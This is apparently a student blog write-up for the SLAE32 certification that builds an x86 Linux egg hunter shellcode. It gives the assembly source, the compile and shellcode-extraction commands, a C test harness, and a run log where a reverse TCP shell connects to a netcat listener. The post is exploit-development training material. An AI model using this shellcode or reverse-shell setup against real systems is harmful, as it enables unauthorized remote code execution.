SLAE32 Assignment3


This blog post has been created for completing the requirments of the SecurityTube (Pentester Academy) x86 Assembly Language and Shellcoding on Linux certification:

x86 Assembly Language and Shellcoding on Linux

Student ID: SLAE-1562


Study about the egg hunter shellcode

Creat a working demo of the egg hunter

Should be configurable for different payload


  • Install libemu
git clone

sudo apt-get install autoconf
sudo apt-get install libtool
autoreconf -v -i
./configure --prefix=/opt/libemu
autoreconf -v -i
sudo make install
  • Obtain the Kali (x86) Linux 2020.3

What is egg hunter?

Egghunter shellcode is a form of staged shellcode. Thinking in Metasploit, you often will find a staged payload where the shellcode has two stages. The first stage will send to the target, then it will connect back to the attacker’s machine, download the second stage shellcode, and execute it. A similar concept is used in egghunter. The payload is marked by an eight bytes egg, such as “\x90\x50\x90\x50\x90\x50\x90\x50”. The egg hunter will search for the memory location where marked by the egg, if found, means the actual shellcode located at that memory address, and the instruction will jump to that address and execute the actual shellcode. The details about egghunter can be found at here. I also refered this article while creating my egghunter.

Step1 - Create the egghunter in assembly(x86)

I used the code from hick.

global _start			

section .text

	or cx,0xfff ;Add PAGE_SIZE-1 to ecx
	inc ecx ;Increment our pointer by one
	push byte +0x43 ;syscall number for sigaction
	pop eax ;put the number 0x43 on eax
	int 0x80
	cmp al,0xf2 ;did we get EFAULT?
	jz loop_inc_page ;Yes, invalid ptr, go to the next page
	mov eax,0x50905090 ;the egg is \x90\x50\x90\x50
	mov edi,ecx ;set edi to the pointer we validated
	scasd ;compare dword in edi to eax
	jnz loop_inc_one ;No match? Increment the pointer by one
	scasd ;Compare the dword in edi to eax again (which is now edi + 4)
	jnz loop_inc_one ;No match? Increment the pointer by one
	jmp edi ;jump to shellcode

Step2 - Compile the egghunter assembly code and extract the shellcode

With the compile script obtained from the SLAE32 course, we can compile the code. Note, NASM is installed by default on kali 2020.3. If not, you need to install the NASM first.


echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm

echo '[+] Linking ...'
ld -z execstack -o $1 $1.o

echo '[+] Done!'
kali@kali:~/Desktop/SLAE-Assignments/assignment3$ ./ egghunter
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Done!

kali@kali:~/Desktop/SLAE-Assignments/assignment3$ objdump -d ./egghunter -M intel

./egghunter:     file format elf32-i386

Disassembly of section .text:

08049000 <_start>:
 8049000:       66 81 c9 ff 0f          or     cx,0xfff

08049005 <loop_inc_one>:
 8049005:       41                      inc    ecx

08049006 <loop_check>:
 8049006:       6a 43                   push   0x43
 8049008:       58                      pop    eax
 8049009:       cd 80                   int    0x80
 804900b:       3c f2                   cmp    al,0xf2

0804900d <loop_check_8_valid>:
 804900d:       74 f1                   je     8049000 <_start>

0804900f <is_egg>:
 804900f:       b8 90 50 90 50          mov    eax,0x50905090
 8049014:       89 cf                   mov    edi,ecx
 8049016:       af                      scas   eax,DWORD PTR es:[edi]
 8049017:       75 ec                   jne    8049005 <loop_inc_one>
 8049019:       af                      scas   eax,DWORD PTR es:[edi]
 804901a:       75 e9                   jne    8049005 <loop_inc_one>

0804901c <matched>:
 804901c:       ff e7                   jmp    edi

kali@kali:~/Desktop/SLAE-Assignments/assignment3$ objdump -d ./egghunter|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Step3 - Place the egghunter into the demo code written in C

I used one of the reverse TCP shellcode from my last post as the second stage shellcode, flag it with the “egg”. The egg is:


unsigned char egghunter[] = \

unsigned char code[] = \

int main()
	printf("Egghunter Length:  %d\n", strlen(egghunter));
	int (*ret)() = (int(*)())egghunter;



Step4 - Compile the code and run it

kali@kali:~/Desktop/SLAE-Assignments/assignment3$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
kali@kali:~/Desktop/SLAE-Assignments/assignment3$ ./shellcode 
Egghunter Length:  30
kali@kali:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 37118
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),117(bluetooth),131(scanner)
Tue Sep  1 17:28:15 EDT 2020



Step5 - Configure the payload

The payload can be easily configured by replacing the code in “unsigned char code[]” variable. Note, do not forget to add the egg flag in front of the payload!


You can find all the above code at here.

Thanks for reading :)